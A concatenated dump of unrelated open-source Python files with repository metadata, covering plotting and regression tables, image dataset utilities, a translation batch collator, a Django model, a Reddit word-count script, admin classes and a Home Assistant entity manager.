etaL,ciL,th_maxL,csM_maxL,csE_maxL = compute_savings_variation(thL,Ptp,Pfp,parameters=parameters)
mineta=np.min(etaL)
maxeta=np.max(etaL)
minci=np.min(ciL)
maxci=np.max(ciL)
ETA,CI = np.meshgrid(etaL,ciL)
fnt_sz=14; lbl_sz=16; fmt = r'$\$%.f$'
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,3,sharex=True,sharey=False,figsize=[15,8])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
levels = [0,10,20,40,60,80,100]
c=ax[0].contour(ETA,CI,csM_maxL-csE_maxL,interpolation='none',levels=levels,
extent=[mineta,maxeta,maxci,minci],aspect='auto',colors='black')
print(c.locate_label)
ax[0].clabel(c,inline=1, fmt=fmt)
ax[0].set_ylabel(r'$E(c_i)$')
ax[0].set_xlabel(r'$\eta$')
ax[0].set_title(r'$E(c_s)$ - 95\% CI')
c=ax[1].contour(ETA,CI,csM_maxL,interpolation='none',levels=levels,
extent=[mineta,maxeta,maxci,minci],aspect='auto',colors='black')
ax[1].clabel(c,inline=1,fmt=fmt)
ax[1].set_ylabel(r'$E(c_i)$')
ax[1].set_xlabel(r'$\eta$')
ax[1].set_title(r'$E(c_s)$')
c=ax[2].contour(ETA,CI,csM_maxL+csE_maxL,interpolation='none',levels=levels,
extent=[mineta,maxeta,maxci,minci],aspect='auto',colors='black')
ax[2].clabel(c,inline=1,fmt=fmt)
ax[2].set_ylabel(r'$E(c_i)$')
ax[2].set_xlabel(r'$\eta$')
ax[2].set_title('$E(c_s)$ + 95\% CI')
#Annotation Shifts
scalex = 0.03*(maxeta-mineta)
scaley = 0.03*(maxci-minci)
eta_ci = get_intervention_data()
for key,value in eta_ci.items():
for i in (0,1,2):
(x,y)=value
ax[i].annotate('*',(x,y),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.4)
ax[i].annotate(r'\textit{'+key+'}',(x-scalex,y-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps',dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def plot_ols_fit(y_pred,y_true,label=['Predicted','Actual'],formula='',table='',export_fn='./Figures/ols_fit.png'):
# Plots actual vs predicted points
# Input is numpy array
rsq = compute_rsq(y_pred,y_true)
miny = np.min([y_pred,y_true])
maxy = np.max([y_pred,y_true])
pady = (maxy-miny)*0.1
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,1,sharex=False,sharey=False,figsize=[10,6])
ax.plot(y_pred,y_true,'.')
ax.set_xlabel('Predicted Weight Change (kg)')
ax.set_ylabel('Actual Weight Change (kg)')
ax.set_ylim([miny-pady,maxy+pady])
ax.set_xlim([miny-pady,maxy+pady])
#ax.set_aspect('equal')
# Plot first-order polynomial to data
fit = np.polyfit(y_pred, y_true, deg=1)
x = np.arange(miny,maxy)
ax.plot(x, fit[0] * x + fit[1],label='actual',
color='lightblue')
# Find limits for expected regression line
lims = [
np.min([ax.get_xlim(), ax.get_ylim()]), # min of both axes
np.max([ax.get_xlim(), ax.get_ylim()]), # max of both axes
]
# Plot expected regression line
ax.plot(lims, lims,label='predicted',
color='lightgray', alpha=0.75, zorder=0)
ax.legend(title=r'Trend ($R^2$=%.3f)'%round(rsq,3),loc='lower right')
# # Add R^2 value:
# pos = [(lims[1]-lims[0])*0.8+lims[0],(lims[1]-lims[0])*0.1+lims[0]]
# ax.annotate('$R^2$=%.2f'%rsq,pos,
# backgroundcolor='white',fontsize=fnt_sz,alpha=0.8)
pos = [(lims[1]-lims[0])*1.05+lims[0],(lims[1]-lims[0])*0.75+lims[0]]
ax.text(pos[0],pos[1],formula)#,
#backgroundcolor='white',fontsize=fnt_sz,alpha=0.8)
pos = [(lims[1]-lims[0])*1.1+lims[0],(lims[1]-lims[0])*0.07+lims[0]]
ax.text(pos[0],pos[1],table,
backgroundcolor='white',fontsize=fnt_sz,alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='png',dpi=500,
facecolor=fig.get_facecolor(), edgecolor='none', bbox_inches='tight')
def param2latex(res):
# This creates a latex table using statsmodels regression results object
coef = res.params.values.tolist() #coefficients
pval = res.pvalues.values.tolist() #their p-values
#95% confidence interval of coefficeints
ci0 = res.conf_int()[0].tolist()
ci1 = res.conf_int()[1].tolist()
ci = [r'%.2f \ \ %.2f'%(ci0[i],ci1[i]) for i in range(0,len(ci0))]
# coef labels
clabel = []
for i in range(0,len(coef)):
clabel.append(r'c_%i'%i)
# create latex table
headers = (r'coef',r'[95.0\% CI]',r'p-value')
table_latex = r"\begin{tabular}{lrrr}"
table_latex += r' & %s & %s & %s '%headers
table_latex += r'\\ \hline '
for i in range(0,len(pval)):
if pval[i]<0.05: #significant
table_latex += r'\\ $%s*$ & %.2f & %s & %.2f'%(clabel[i],coef[i],ci[i],pval[i])
else:
table_latex += r'\\ $%s$ & %.2f & %s & %.2f'%(clabel[i],coef[i],ci[i],pval[i])
table_latex += r'\\ \hline '
table_latex += r'\multicolumn{4}{l}{$*$ statistically significant ($p<0.05$)}'
table_latex += r'\end{tabular}'
return table_latex
| rupndrsingh/predictions-mvc | pLib/rs_model_metrics.py | rs_model_metrics.py | py | 22,722 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pandas.Series",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.classificat... |
38776541163 |
def load_and_display(file_index,mode='both'):
filename = get_image_filename(file_index)
import pickle
import numpy as np
image = pickle.load( open( filename, "rb" ) )
if mode == 'both':
display_image(image)
else:
# Reconstruct the original rgb and depth images from the merged values
import cv2
red, green, blue, depth = cv2.split(image)
if mode == 'rgb':
rgb_image = cv2.merge((red,green,blue))
display_image(rgb_image)
elif mode == 'depth':
depth_image = cv2.merge((depth,depth,depth))
display_image(depth_image)
else:
print('Invalid image display mode. Please select from both, rgb or depth.')
def display_image(image):
from matplotlib import pyplot as plt #note there is an opencv image viewing alternative called imshow and waitkey
fig, ax = plt.subplots()
ax.imshow(image)
plt.show()
def get_image_filename(index):
import os
prefix='image_{}_'.format(index)
prefixed = [filename for filename in os.listdir('dataset') if filename.startswith(prefix)]
if len(prefixed)>0:
return 'dataset/'+prefixed[0]
else:
raise FileNotFoundError("No filename found with index of {}".format(index))
return ''
def save_images(dataset_folder, save_frequency):
print('Saving images')
import cv2
import pickle
import os
# saves all the files in the dataset folder as image files in a different folder
image_folder= 'images/'
# all files
prefix='image_'
prefixed = sorted([filename for filename in os.listdir(dataset_folder) if filename.startswith(prefix)])
# only keep some of the files (at a regular interval)
sparce_files=[i for i in prefixed if int(i.split('_')[1])%save_frequency==0]
for image_pickle_file in sparce_files:
image = pickle.load( open( dataset_folder+'/'+image_pickle_file, "rb" ) )
red, green, blue, depth = cv2.split(image)
rgb_image = cv2.merge((red,green,blue))
depth_image = cv2.merge((depth,depth,depth))
image_name = image_pickle_file.replace('.pickle','')
print('saving image {}'.format(image_name))
save_image2(image_folder+'rgb/'+image_name , rgb_image)
save_image2(image_folder+'depth/'+image_name , depth_image)
def save_image(filename,image):
from matplotlib import pyplot as plt
fig, ax = plt.subplots()
ax.imshow(image)
plt.savefig(filename+'.png', bbox_inches='tight')
plt.close()
def save_image2(filename,image):
import cv2
import numpy as np
cv2.imwrite(filename+'.png',image)
def downsize_all(dataset_folder,newfolder,newsize):
import cv2
import pickle
import os
# all files
prefix='image_'
prefixed = sorted([filename for filename in os.listdir(dataset_folder) if filename.startswith(prefix)])
for image_pickle_file in prefixed:
big_image = pickle.load( open( dataset_folder+'/'+image_pickle_file, "rb" ) )
small_image = cv2.resize(big_image,(newsize,newsize))
pickle.dump(small_image,open( newfolder + '/' + image_pickle_file , 'wb' ))
print('resized file: {}'.format(image_pickle_file))
def remove_depth(dataset_folder,newfolder):
import cv2
import pickle
import os
# all files
prefix='image_'
prefixed = sorted([filename for filename in os.listdir(dataset_folder) if filename.startswith(prefix)])
for image_pickle_file in prefixed:
#load files
full_image = pickle.load( open( dataset_folder+'/'+image_pickle_file, "rb" ) )
#split pixels
red, green, blue, depth = cv2.split(full_image)
#create rgb
output_data = cv2.merge((red, green, blue))
#save file
pickle.dump(output_data,open( newfolder + '/' + image_pickle_file , 'wb' ))
print('new rgb only file: {}'.format(image_pickle_file))
# downsize_all('unzipped','small',250)
# remove_depth('small','small_rgb')
save_images('second_dataset',1)
# load_and_display(0)
# load_and_display(0,'rgb')
# load_and_display(0,'depth')
| andrew-houghton/self-driving-donkey-car | Utility code/utilities.py | utilities.py | py | 4,122 | python | en | code | 7 | github-code | 1 | [
{
"api_name": "pickle.load",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cv2.split",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.merge",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "cv2.merge",
"line_number": 18,
... |
11981080026 | from decimal import Decimal
from django.db import models
from django_countries.fields import CountryField
class Partner(models.Model):
uid = models.AutoField(primary_key=True)
partner_id = models.CharField(
max_length=3,
unique=True,
error_messages={"unique": "This Partner ID is already in use."},
)
company = models.CharField(max_length=64, unique=True)
contact_name = models.CharField(max_length=64)
contact_email = models.EmailField()
contact_phone = models.CharField(
max_length=16,
blank=True,
help_text="Must have only digits and an optional country code prefixed with a plus sign",
)
address1 = models.CharField(max_length=48, help_text="Street address, P.O. box")
address2 = models.CharField(
max_length=32, blank=True, help_text="Apartment, suite, unit, building, floor"
)
city = models.CharField(max_length=32)
state = models.CharField(
max_length=32, help_text="Should use 2 letter abbreviations for U.S. states"
)
zipcode = models.CharField(max_length=16)
country = CountryField(blank_label="")
notes = models.TextField(blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
ordering = ["company"]
def __str__(self):
return self.company
def get_pretty_contact_phone(self):
if len(self.contact_phone) == 10:
return f"({self.contact_phone[:3]}) {self.contact_phone[3:6]}-{self.contact_phone[6:10]}"
elif len(self.contact_phone) in [12, 13] and self.contact_phone[0] == "+":
return f"{self.contact_phone[:-10]} ({self.contact_phone[-10:-7]}) {self.contact_phone[-7:-4]}-{self.contact_phone[-4:]}"
else:
return self.contact_phone
def get_address1(self):
address = self.address1
if self.address2:
address += ", " + self.address2
return address
def get_address2(self):
address = self.city
address += ", " + self.state
address += " " + self.zipcode
return address
def get_statistics(self):
statistics = {
"non_void_invoices_count": self.invoices.exclude(status=4).count()
}
# The total amount of money this partner has been billed for
statistics["total_billed"] = Decimal("0.00")
for invoice in self.invoices.exclude(status=4).exclude(status=0):
statistics["total_billed"] += invoice.get_total()
return statistics
def get_last_invoice(self):
return self.invoices.exclude(status=4).exclude(status=0).last()
| yezz123/My-Business | partners/models.py | models.py | py | 2,687 | python | en | code | 45 | github-code | 1 | [
{
"api_name": "django.db.models.Model",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.db.models.AutoField",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "... |
13461593976 | from typing import Dict, List, Union
import numpy as np
import torch
from src.utils.utils import shift_lang_token_right
class BatchCollator:
def __init__(self,
is_mlm: bool = False,
shift_lang_token: bool = False,
return_special_masks: bool = False,
return_lengths: bool = False,
pad_token_id: int = 1) -> None:
"""
Standard collator, its work consists in batching the source and target sentences and creating
the decoder inputs.
:param is_mlm: whether the collator is used for a masked language model (MLM), if False then we're dealing with
a causal model and the labels must be shifted to the right in order to create the decoder inputs
(default=False).
:param shift_lang_token: whether to move the lang token at the beginning of the source sentences
(default=False).
:param return_special_masks: whether to return the special tokens mask for the both input ids and labels
(default=False).
:param pad_token_id: the pad token id (default=1).
"""
self.is_mlm = is_mlm
self.shift_lang_token = shift_lang_token
self.return_special_masks = return_special_masks
self.return_lengths = return_lengths
self.pad_token_id = pad_token_id
def __call__(self, batch) -> Dict[str, Union[torch.Tensor, List[List[str]]]]:
# Put all the tokenized source and target sentences together
src_max_length = 0
tgt_max_length = 0
src_tokenized_sentences = []
tgt_tokenized_sentences = []
input_ids_special_masks = []
labels_special_masks = []
references: List[List[str]] = []
for sentence_pair in batch:
tokenized_src = sentence_pair["input_ids"]
tokenized_tgt = sentence_pair["labels"]
src_tokenized_sentences.append(tokenized_src)
tgt_tokenized_sentences.append(tokenized_tgt)
src_max_length = max(src_max_length, tokenized_src.size(-1))
tgt_max_length = max(tgt_max_length, tokenized_tgt.size(-1))
references.append([sentence_pair["reference"]])
input_ids_special_masks.append(sentence_pair["input_ids_special_mask"])
labels_special_masks.append(sentence_pair["labels_special_mask"])
# Pad the tensors and batchify them
input_ids = [torch.cat([src, src.new(1, src_max_length - src.size(-1)).fill_(self.pad_token_id)], dim=-1)
for src in src_tokenized_sentences]
labels = [torch.cat([tgt, tgt.new(1, tgt_max_length - tgt.size(-1)).fill_(self.pad_token_id)], dim=-1)
for tgt in tgt_tokenized_sentences]
input_ids = torch.stack(input_ids, dim=0).squeeze(1) # (bsz, src_max_length)
labels = torch.stack(labels, dim=0).squeeze(1) # (bsz, tgt_max_length)
# Create decoder input ids
if not self.is_mlm:
if self.shift_lang_token:
# Move the tgt lang token to the first position in a MBart fashion
decoder_input_ids = shift_lang_token_right(labels, self.pad_token_id)
else:
# The usual shift seen for causal language models
decoder_input_ids = labels[:, :-1]
labels = labels[:, 1:]
else:
# This is applied for masked language models such as CMLM
decoder_input_ids = labels.detach().clone()
# Compute the special tokens masks
input_ids_special_mask = None
labels_special_mask = None
if self.return_special_masks or self.return_lengths:
input_ids_special_mask = [torch.cat([mask, mask.new(1, src_max_length - mask.size(-1)).fill_(1)], dim=-1)
for mask in input_ids_special_masks]
input_ids_special_mask = torch.stack(input_ids_special_mask, dim=0).squeeze(1) # (bsz, src_max_length)
labels_special_mask = [torch.cat([mask, mask.new(1, tgt_max_length - mask.size(-1)).fill_(1)], dim=-1)
for mask in labels_special_masks]
labels_special_mask = torch.stack(labels_special_mask, dim=0).squeeze(1) # (bsz, tgt_max_length)
# Compute the source and target lengths, they do not take into account the special tokens
src_lengths = []
tgt_lengths = []
if self.return_lengths:
src_lengths = torch.sum(input_ids.ne(1), dim=-1).unsqueeze(-1) # (bsz, 1)
tgt_lengths = torch.sum(labels_special_mask.ne(1), dim=-1).unsqueeze(-1) # (bsz, 1)
return {"input_ids": input_ids, "labels": labels, "decoder_input_ids": decoder_input_ids,
"input_ids_special_mask": input_ids_special_mask, "labels_special_mask": labels_special_mask,
"references": references, "src_lengths": src_lengths, "tgt_lengths": tgt_lengths}
class BatchCollatorCMLM(BatchCollator):
def __init__(self, pad_token_id: int = 1, mask_token_id: int = 5, train: bool = False) -> None:
"""
Variation of the standard batch collator, used mainly for the CMLM model. At training time, the
decoder inputs (except for special tokens like pad and lang) are masked by a random number in
[1, seq_len - n_special_tokens], the labels are then padded where the masks are placed. At inference time,
all the decoder inputs (except, again, the special tokens) are masked.
:param pad_token_id: the pad token id (default=1).
:param mask_token_id: the mask token id (default=5).
:param train: whether the collator is used during training (default=False).
"""
super().__init__(True, False, True, True, pad_token_id)
# Parameters
self.mask_token_id = mask_token_id
self.train = train
def __mask_target(self,
labels: torch.Tensor,
decoder_input_ids: torch.Tensor,
labels_special_mask: torch.Tensor) -> Dict[str, torch.Tensor]:
batch_size, seq_len = labels.size()
# Compute the number of special tokens for each sentence
n_special_tokens = torch.sum(labels_special_mask, dim=-1)
# At least one token per each sentence should be masked
min_masks = 1
# Keep the indexes of those tokens that can be masked and the number of such tokens
maskable_tokens_idxs = [(mask == 0).nonzero(as_tuple=True)[0].tolist() for mask in labels_special_mask]
n_maskable_tokens = seq_len - n_special_tokens
# Mask tokens loop
if self.train:
# At training time we mask out a number of tokens in [1, seq_len - n_special_tokens] from the decoder inputs
labels = labels.new(batch_size, seq_len).fill_(self.pad_token_id)
np_generator = np.random.default_rng()
for i, max_tokens_to_mask in enumerate(n_maskable_tokens):
if max_tokens_to_mask > 0:
# Sample the number of tokens to mask with a uniform distribution
sample_size = np_generator.integers(min_masks, max_tokens_to_mask + 1)
# Sample the idxs to mask
masks = np_generator.choice(maskable_tokens_idxs[i], sample_size, replace=False)
# Mask the decoder inputs
labels[i, masks] = decoder_input_ids[i, masks]
decoder_input_ids[i, masks] = self.mask_token_id
else:
labels[i] = decoder_input_ids[i]
else:
# At inference time we mask the entire decoder inputs
for i, maskable_tokens in enumerate(maskable_tokens_idxs):
decoder_input_ids[i, maskable_tokens] = self.mask_token_id
return {"labels": labels, "decoder_input_ids": decoder_input_ids}
def __call__(self, batch) -> Dict[str, Union[torch.Tensor, List[List[str]]]]:
tokenized_batch = super().__call__(batch)
input_ids = tokenized_batch["input_ids"]
references = tokenized_batch["references"]
tgt_lengths = tokenized_batch["tgt_lengths"]
masked_target = self.__mask_target(tokenized_batch["labels"], tokenized_batch["decoder_input_ids"],
tokenized_batch["labels_special_mask"])
return {"input_ids": input_ids, "references": references, "labels": masked_target["labels"],
"decoder_input_ids": masked_target["decoder_input_ids"], "tgt_lengths": tgt_lengths}
| RistoAle97/ContinualNAT | src/data/collators.py | collators.py | py | 8,618 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "typing.List",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "torch.cat",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "src.utils.utils",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "src.utils.utils.new",
"line... |
31208597289 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
author comger@gmail.com
"""
import sys
import json
sys.path.append('../../')
from datetime import datetime
from pprint import pprint
from kpages import run
def callback(app):
print("Start time: {0}".format(datetime.now().isoformat(" ")))
print("Config Params")
for k in sorted(app.settings.keys()):
if k.startswith("__"):
continue
print("{0:<40}:{1}".format(k, app.settings[k]))
print("Router Handlers")
for h in app.handlers:
print('{0:<50}:{1}'.format(str(h[1]),str(h[0])))
if __name__ == "__main__":
try:
run(callback)
except KeyboardInterrupt:
print('exit server ')
# vim: ts=4 sw=4 sts=4 expandtab
| comger/kpages | demos/web/apprun.py | apprun.py | py | 748 | python | en | code | 23 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",... |
28541279468 | import csv
import matplotlib.pyplot as plt
'''
Get a list of keys from dictionary which has value that matches with any value in given list of values
'''
def getKeysByValues(dictOfElements, value):
listOfKeys = list()
listOfItems = dictOfElements.items()
for item in listOfItems:
if item[1] == value:
listOfKeys.append(item[0])
return listOfKeys
sem_li = []
with open('temperaturas_2021.csv') as f:
csv_reader = csv.reader(f, delimiter=';')
for row in csv_reader:
sem_li.append(row)
days = {}
for day in sem_li[1:]:
days[day[0]] = (sum([float(temp) for temp in day[1:]])/len(day[1:]))
plt.plot(*zip(*days.items()))
plt.ylabel('Average Temperature')
plt.xlabel('Days')
all_values = days.values()
max_value = max(all_values)
min_value = min(all_values)
for x in getKeysByValues(days , max_value):
plt.plot(x , max_value, marker = 'o')
plt.text(x, max_value , round(max_value , 2) , fontsize=7)
for x in getKeysByValues(days, min_value):
plt.plot(x , min_value, marker = 'o')
plt.text(x, min_value , round(min_value , 2), fontsize=7)
plt.show()
print(days)
| aquarios77/python | 2021-04-08/temp_udz.py | temp_udz.py | py | 1,161 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "csv.reader",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot... |
23463756424 | #!/usr/bin/python3
"""Advanced API.
***This is an advanced task***
For this task, we'll recursively call the Reddit API,
parse the titles of all hot articles and return a sorted
count of given keywords(case-sensitive, delimited by
spaces).
Note:
1. No iteration!
2. If `word_list` contains duplicates, then the sum
of each duplicate should be returned.
3. Considering "java" as the keyword passed:
a. "java java java" counts as 3 separate instances
of "java"
b. "java!", "java_" or "java*" shouldn't count as
"java"
4. If posts don't match or subreddit doesn't exist,
print nothing.
"""
import requests
def count_words(subreddit, word_list=[], word_count={}, after=None):
"""Return the keyword count.
Args:
subreddit ('obj':'str'): The subreddit
word_list ('obj':'list'): The keyword list
word_count ('obj':'dict'): The count dictionary
after ('obj':'None'): The place holder
Returns:
word_list; nothing, otherwise.
"""
url = 'https://www.reddit.com/r/{}/hot.json'.format(subreddit)
param = {"after": after}
header = {"User-Agent": "My-User-Agent"}
data = requests.get(
url,
headers=header,
params=param,
allow_redirects=False
)
if data.status_code != 200:
return None
info = data.json()
hot_list = [
c.get("data").get("title") for c in info.get("data")
.get("children")
]
if not hot_list:
return None
word_list = list(dict.fromkeys(word_list))
if word_count == {}:
word_count = {w: 0 for w in word_list}
for title in hot_list:
split_words = title.split(' ')
for word in word_list:
for s_word in split_words:
if s_word.lower() == word.lower():
word_count[word] += 1
if not info.get("data").get("after"):
sorted_counts = sorted(word_count.items(), key=lambda kv: kv[0])
sorted_counts = sorted(word_count.items(),
key=lambda kv: kv[1], reverse=True)
[print('{}: {}'.format(k, v)) for k, v in sorted_counts if v != 0]
else:
return count_words(
subreddit,
word_list,
word_count,
info.get("data").get("after")
)
| brian-ikiara/alx-system_engineering-devops | 0x16-api_advanced/100-count.py | 100-count.py | py | 2,452 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 42,
"usage_type": "call"
}
] |
10927245542 | import requests
from auth import get_auth_data
from req import consumer_key
auth = get_auth_data()
def add_bookmark(url, title):
res = requests.post("https://getpocket.com/v3/add", json={
"url": url,
"title": title,
"consumer_key": consumer_key,
"access_token": auth["access_token"],
})
if res.status_code == 200:
print("Success!")
else:
print("Error!")
# print(res.content)
| gebeto/python | pocket-py/api.py | api.py | py | 397 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "auth.get_auth_data",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "req.consumer_key",
"line_number": 12,
"usage_type": "name"
}
] |
11811149957 | import nested_admin
from django.contrib import admin
from cms.contexts.admin import AbstractCreatedModifiedBy
from . models import NavigationBar, NavigationBarItem, NavigationBarItemLocalization
class NavigationBarItemLocalizationInline(nested_admin.NestedStackedInline):
model = NavigationBarItemLocalization
extra = 0
classes = ['collapse']
sortable_field_name = ""
class NavigationBarItemInline(nested_admin.NestedStackedInline):
model = NavigationBarItem
raw_id_fields = ('parent', 'webpath',
'publication', 'inherited_content')
extra = 0
# classes = ['collapse']
inlines = (NavigationBarItemLocalizationInline,)
sortable_field_name = "order"
readonly_fields = ('created_by', 'modified_by',)
fieldsets = (
(None, {'fields': (('name', 'parent', 'order', 'is_active'),
)}),
('weblink', {'fields': (('webpath', 'url', 'publication')),
'classes':('collapse',),
}
),
('inherited_content', {'fields': (('inherited_content'),),
'classes':('collapse',)
}
)
)
@admin.register(NavigationBar)
class NavigationBarAdmin(AbstractCreatedModifiedBy,
nested_admin.NestedModelAdmin):
list_display = ('name', 'is_active', 'created')
search_fields = ('name',)
list_filter = ('created', 'modified')
readonly_fields = ('created_by', 'modified_by')
inlines = (NavigationBarItemInline,)
@admin.register(NavigationBarItem)
class NavigationBarItemAdmin(AbstractCreatedModifiedBy,
nested_admin.NestedModelAdmin):
list_display = ('menu', 'name', 'parent', 'is_active')
search_fields = ('name',)
list_filter = ('created', 'modified')
readonly_fields = ('created_by', 'modified_by')
inlines = (NavigationBarItemLocalizationInline,)
raw_id_fields = ('menu', )
| UniversitaDellaCalabria/uniCMS | src/cms/menus/admin.py | admin.py | py | 2,075 | python | en | code | 5 | github-code | 1 | [
{
"api_name": "nested_admin.NestedStackedInline",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "models.NavigationBarItemLocalization",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nested_admin.NestedStackedInline",
"line_number": 15,
"usage_typ... |
24284540158 | """Bolted Entity Manager"""
from collections.abc import Mapping, MutableMapping
import logging
from typing import Any, Optional
import homeassistant.helpers.device_registry as hass_device_registry
import homeassistant.helpers.entity_registry as hass_entity_registry
from homeassistant.helpers.restore_state import (
ExtraStoredData,
RestoredExtraData,
RestoreEntity,
)
from .helpers import ObservableVariable
_LOGGER: logging.Logger = logging.getLogger(__package__)
class EntityManager:
"""Entity Manager."""
hass = None
platform_adders = {}
platform_classes = {}
registered_entities = {}
@classmethod
def init(cls, hass):
"""Initialize Class Variables"""
cls.hass = hass
cls.entity_registry = hass_entity_registry.async_get(hass)
cls.device_registry = hass_device_registry.async_get(hass)
@classmethod
def register_platform(cls, platform, adder, entity_class):
"""Register platform from Home Assistant"""
_LOGGER.debug(
"Platform %s Registered",
platform,
)
cls.platform_adders[platform] = adder
cls.platform_classes[platform] = entity_class
cls.registered_entities[platform] = {}
@classmethod
async def get(cls, bolted, platform, name, restore=False):
"""Get an Entity from Bolted"""
unique_id = f"{bolted.__class__.__module__}::{bolted.name}::{name}"
await cls.wait_platform_registered(platform)
if (
platform not in cls.registered_entities
or unique_id not in cls.registered_entities[platform]
):
await cls.create(bolted, platform, name, restore=restore)
return cls.registered_entities[platform][unique_id]
@classmethod
async def create(cls, bolted, platform, name, restore=False):
"""Create entity from Bolted."""
unique_id = f"{bolted.__class__.__module__}::{bolted.name}::{name}"
await cls.wait_platform_registered(platform)
_LOGGER.debug("Created New Entity %s %s", platform, unique_id)
new_entity = cls.platform_classes[platform](
cls.hass, bolted, unique_id, restore=restore
)
new_entity.entity_id = f"{platform}.{bolted.name}_{name}"
cls.platform_adders[platform]([new_entity])
await new_entity.wait_for_added()
cls.registered_entities[platform][unique_id] = new_entity
@classmethod
def remove(cls, entity):
entity.set(None, {})
# entity IDs don't stick with this. commenting for now.
# entity_id = entity.entity_id
# unique_id = entity.unique_id
# entity_platform, _ = entity_id.split('.', 1)
# _LOGGER.debug('Removing Entity %s', entity_id)
# cls.entity_registry.async_remove(entity_id)
# del cls.registered_entities[entity_platform][unique_id]
@classmethod
async def wait_platform_registered(cls, platform):
"""Wait for platform registration."""
if platform not in cls.platform_classes:
raise KeyError(f"Platform {platform} not registered.")
return True
@classmethod
def get_by_entity_id(cls, entity_id):
return cls.entity_registry.async_get(entity_id)
@classmethod
def get_device_id(cls, entity_id):
this_entity = cls.get_by_entity_id(entity_id)
if this_entity is None:
return None
return this_entity.device_id
@classmethod
def get_device_by_entity_id(cls, entity_id):
device_id = cls.get_device_id(entity_id)
if device_id is None:
return None
return cls.device_registry.async_get(device_id)
class BoltedEntity(RestoreEntity):
"""Base Class for all Bolted Entities"""
_attr_unique_id: Optional[str] = None
_attr_should_poll = False
_attr_extra_state_attributes: MutableMapping[str, Any]
_attr_bolted_state_attributes: MutableMapping[str, Any]
_restorable_attributes = None
def __init__(self, hass, bolted, unique_id, restore=False):
self.hass = hass
self.bolted = bolted
self._added = ObservableVariable(False)
self._should_restore = restore
self._attr_unique_id = unique_id
self._attr_bolted_state_attributes = {
"bolted_app": self.bolted.__class__.__module__,
"bolted_app_name": self.bolted.name,
}
_LOGGER.debug(
"Entity Initialized %s",
self.unique_id,
)
async def wait_for_added(self):
while self._added.value is not True:
_LOGGER.debug("Waiting for Entity to be added %s", self.unique_id)
await self._added.wait()
@property
def extra_state_attributes(self) -> Optional[Mapping[str, Any]]:
"""Return entity specific state attributes."""
attrs = {}
if hasattr(self, "_attr_extra_state_attributes"):
attrs.update(self._attr_extra_state_attributes)
if hasattr(self, "_attr_bolted_state_attributes"):
attrs.update(self._attr_bolted_state_attributes)
return attrs
@property
def extra_restore_state_data(self) -> Optional[ExtraStoredData]:
"""Return entity specific state data to be restored.
Implemented by platform classes.
"""
if self._restorable_attributes is None:
return None
restore = dict()
for key in self._restorable_attributes:
restore[key] = getattr(self, key)
return RestoredExtraData(restore)
async def async_added_to_hass(self):
"""Called when Home Assistant adds the entity to the registry"""
await super().async_added_to_hass()
if self._should_restore:
last_data = await self.async_get_last_extra_data()
self.bolted.logger.debug(
"Last Data %s: %s", self.unique_id, last_data
)
if last_data is not None:
for key, value in last_data.as_dict().items():
self.bolted.logger.debug(
"Restore %s = %s value", key, value
)
setattr(self, key, value)
self._added.value = True
self.async_update()
_LOGGER.debug(
"Entity %s Added to Hass as %s",
self.unique_id,
self.entity_id,
)
# USED INTERNALLY
#####################################
def async_update(self):
"""Request an entity update from Home Assistant"""
if self._added.value is True:
self.async_write_ha_state()
| dlashua/bolted | custom_components/bolted/entity_manager.py | entity_manager.py | py | 6,631 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "logging.Logger",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "homeassistant.helpers.entity_registry.async_get",
"line_number": 32,
"usage_type": "call"
},
{
... |
31278852115 | """
Center crop all the source images down to 512x512
"""
from PIL import Image
from PIL import ImageOps
import os
SOURCE_DIR = "source_images_blur"
OUT_DIR = "cropped_images_blur"
WIDTH = 512
HEIGHT = 512
for f in os.listdir(SOURCE_DIR):
im = Image.open(os.path.join(SOURCE_DIR, f))
# resize image
